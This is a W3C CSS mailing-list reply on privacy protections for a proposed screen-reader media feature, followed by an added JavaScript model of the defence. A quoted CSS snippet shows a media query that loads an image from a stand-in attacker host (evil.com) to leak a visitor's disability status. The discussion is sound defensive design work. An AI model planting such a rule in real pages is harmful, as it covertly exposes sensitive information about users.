
Re: [css-speech][css-content][mediaqueries] Making Generated Content Accessible

From: James Craig <jcraig@apple.com>
Date: Tue, 2 Dec 2014 13:58:47 -0800
Cc: fantasai <fantasai.lists@inkedblade.net>, Alan Stearns <stearns@adobe.com>, www-style list <www-style@w3.org>, "Tab Atkins Jr." <jackalmage@gmail.com>, fantasai <fantasai@inkedblade.net>
Message-Id: <944081B4-1B48-4DFB-AD6F-637103278F6B@apple.com>
To: Florian Rivoal <florian@rivoal.net>

> On Dec 2, 2014, at 1:46 PM, Florian Rivoal <florian@rivoal.net> wrote:
>> It'd be problematic to offer an unprotected "(screenreader)" media feature because it would offer any web page the ability to detect with a high degree of certainty that a visitor has a particular physical disability. In my opinion, it would be a privacy and personal security nightmare to implement *unless* CSS were to implement a media feature privacy model similar to the one defined in IndieUI User Context.
> I agree that a privacy protecting model is worth having for something like this. However, unless I am missing something, the privacy model you propose doesn’t provide adequate protection. What prevents authors from doing this:
> <style>
> @media (screenreader) { #snoop { background: url(http://www.evil.com/info-leak.gif); } }
> </style>
> <div id="snoop"></div>

That wouldn't ever load the image until after the user had approved access. It would also not be subject to a timing attack because the prompt would not block.

From the spec:

To avoid privacy concerns, User Agents MUST immediately return the default value for any restricted features that will result in a user prompt. If and when the user chooses to share settings from the relevant category with the requesting page, the web page author can handle a user setting change callback, or make a subsequent request to the userSetting() method of the Window object.

Received on Tuesday, 2 December 2014 21:59:16 UTC
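
The behaviour described in this message, modelled as an added example (not part of the original e-mail or of the IndieUI specification): a toy user agent returns the default value synchronously while the prompt is pending, so the `#snoop` rule causes no fetch until the user approves. The class and method names, the per-origin grant, the treatment of a denial, and the `.example` URLs are assumptions of this sketch.

```javascript
// Toy model of a user agent gating a restricted feature (added illustration).
// All names are hypothetical; per-origin grants are an assumption of this model.
class UserAgentModel {
  constructor(realSettings, defaults) {
    this.real = realSettings;      // what the user actually has configured
    this.defaults = defaults;      // what every page sees before approval
    this.granted = new Set();      // "origin|feature" pairs the user approved
    this.pending = new Set();      // prompts shown but not yet answered
    this.listeners = new Map();    // "origin|feature" -> change callbacks
  }

  // Synchronous and non-blocking: the return value never waits on the prompt.
  querySetting(origin, feature, onChange) {
    const key = `${origin}|${feature}`;
    if (this.granted.has(key)) return this.real[feature];
    this.pending.add(key);         // prompt is queued, the page keeps running
    if (onChange) {
      if (!this.listeners.has(key)) this.listeners.set(key, []);
      this.listeners.get(key).push(onChange);
    }
    return this.defaults[feature]; // same answer for every user
  }

  // The user answers the prompt some time later.
  decidePrompt(origin, feature, allow) {
    const key = `${origin}|${feature}`;
    if (!this.pending.delete(key)) return;
    if (!allow) return;            // assumption: a denial looks like no answer
    this.granted.add(key);
    for (const cb of this.listeners.get(key) || []) cb(this.real[feature]);
  }

  // URLs fetched by a rule such as
  // @media (screenreader) { #snoop { background: url(...) } }
  matchedLoads(origin, feature, url) {
    return this.querySetting(origin, feature) ? [url] : [];
  }
}

// Constructed scenario: a screen-reader user visits a page carrying the snoop rule.
function snoopScenario() {
  const ua = new UserAgentModel({ screenreader: true }, { screenreader: false });
  const url = "https://tracker.example/info-leak.gif";
  const before = ua.matchedLoads("https://page.example", "screenreader", url);
  ua.decidePrompt("https://page.example", "screenreader", true);
  const after = ua.matchedLoads("https://page.example", "screenreader", url);
  const other = ua.matchedLoads("https://other.example", "screenreader", url);
  return { before, after, other };
}
```

Before approval the page sees the default whether or not a screen reader is running, and a grant to one origin does not change what another origin sees.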
